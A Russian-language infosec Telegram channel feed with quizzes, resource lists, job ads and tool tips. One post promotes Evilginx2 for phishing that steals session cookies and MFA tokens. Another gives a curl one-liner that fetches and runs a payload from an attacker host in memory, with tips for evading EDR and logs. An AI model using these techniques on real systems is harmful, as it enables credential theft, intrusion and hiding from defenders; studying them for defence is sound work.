Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
12.6K subscribers
1.96K photos
110 videos
166 files
2.99K links
Все самое полезное по инфобезу в одном канале.

Список наших каналов: https://t.iss.one/proglibrary/9197

Для обратной связи: @proglibrary_feeedback_bot

По рекламе: @proglib_adv
РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf
Download Telegram
Какой HTTP-код придумали шутки ради, а потом он стал мемом
Anonymous Quiz
26%
451
14%
499
21%
418
38%
999
💯5😁1
🛠 Фишка инструмента: Evilginx2

Evilginx2 — это фреймворк для phishing-атаки без паролей, главная фишка которого в том, что он перехватывает cookies сессии и токены MFA.

Чем полезен:

— Обход классических 2FA/SMS/MFA

— Реалистичные фишинговые страницы (копируются вживую)

— Поддержка кастомных фишинговых шаблонов

— Логи сессий с захваченными cookies и токенами

Пример запуска:

evilginx -p ./phishlets/microsoft.yaml 


После запуска жертва открывает фишинговый домен, проходит логин, а атакующий получает рабочие cookies.

🔗 GitHub проекта

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5👏1
👮‍♀️ Разбор APK мессенджера Max

Мессенджер Max активно продвигают как «новинку», но под капотом он оказался куда более знакомым.

В карточках — что внутри Max, на чём он работает и как обстоят дела с безопасностью 🔒

🔗 Полный текст статьи — по ссылке

🐸 Библиотека хакера
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚82
🖥 Шпаргалка по Bash

Не базовые ls и cd, а готовые мини-скрипты: перенос директорий, умное переименование файлов, калькулятор, расширенный пинг и даже предсказания с cowsay.

🔗 Сама подборка по ссылке

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
5😁3🔥1
👮‍♀️ Beyond Basics: ресурсы для тех, кто хочет больше, чем просто XSS

Если хотите выйти за рамки базового пентеста и реально прокачать навыки, эти темы и ресурсы точно стоит изучить:

➡️ HackTricks

Обширный вики-справочник по пентесту и CTF: от эксплуатации уязвимостей до обхода защит. Отлично структурирован и регулярно обновляется сообществом.

➡️ GTFOBins

Каталог Unix-бинарников, которые можно использовать для обхода локальных ограничений и эскалации привилегий. Полезен при работе с ограниченными шеллами.

➡️ PayloadsAllTheThings

Коллекция полезных пэйлоадов и техник обхода для тестирования веб-приложений. Подходит для пентестеров и участников CTF.

➡️ Malware Unicorn

Ресурс, предлагающий материалы по анализу вредоносного ПО, включая лабораторные задания и руководства.

➡️ pwn.college

Образовательная платформа, предлагающая курсы по низкоуровневой безопасности, реверс-инжинирингу и эксплуатации уязвимостей.

🐸 Библиотека хакера

#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5😢1
🤪 Небезопасный WebSocket

Вы тестируете веб-приложение, которое передаёт данные чата через WebSocket. При анализе трафика вы замечаете:

— Подключение идёт по ws:// вместо wss://

— Сообщения передаются в открытом виде (JSON без шифрования)

— В сообщениях содержатся идентификаторы пользователей и текст переписки

Какая уязвимость возникает в такой конфигурации

🐸 Библиотека хакера

#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔3
🏃‍♀️ Новый поток курса — собери своих AI-агентов

7 октября стартует второй поток курса «AI-агенты для DS-специалистов».
За 5 недель вы научитесь собирать агентов, которые уже сейчас будут помогать бизнесу.

В кружке выше Максим Шаланкин, наш преподаватель, рассказывает подробнее — включай, чтобы не пропустить.

👉 Записаться на курс
Please open Telegram to view this post
VIEW IN TELEGRAM
🤑 Топ-вакансий для хакеров за неделю

Специалист по информационной безопасности — 230 000 ₽, офис (Москва)

Инженер ИБ сервисов — удаленно/гибрид (Москва)

Pentester — от 380 000 ₽, удаленно (Москва)

Information Security Specialist (DLP) — от 120 000 ₽, офис (Москва)

Специалист ИБ — от 200 000 до 300 000 ₽, офис (Моска)

➡️ Еще больше топовых вакансий — в нашем канале InfoSec jobs

🐸 Библиотека хакера

#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
😁3🔥1
💾 Запуск бинарника напрямую из памяти

Если нельзя писать на диск или не хочется светиться в логах — можно выполнить ELF-бинарник напрямую из памяти, минуя файловую систему:


curl https://attacker/payload.elf | bash -c 'chmod +x /dev/fd/0 && /dev/fd/0'


Как работает:

— curl тянет бинарь по HTTP

— /dev/fd/0 — спецфайл, указывающий на поток stdin

— chmod +x делает поток исполняемым

— /dev/fd/0 сразу запускается как исполняемый ELF

⚠️ Бинарник не сохраняется и не появляется на диске даже временно.

Полезно для:

Разведки без следов (auditd, EDR, inotify не ловят файл)

Обхода ограничений записи (tmp, noexec)

Тестов persistence без артефактов

CTF и отработки техник memory execution

💡 Лайфхаки:

— Заменить curl на wget -qO-, socat, nc, httpie

— Альтернатива: /proc/self/fd/0

— Можно обфусцировать URL, использовать TLS и подмену юзер-агента

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍1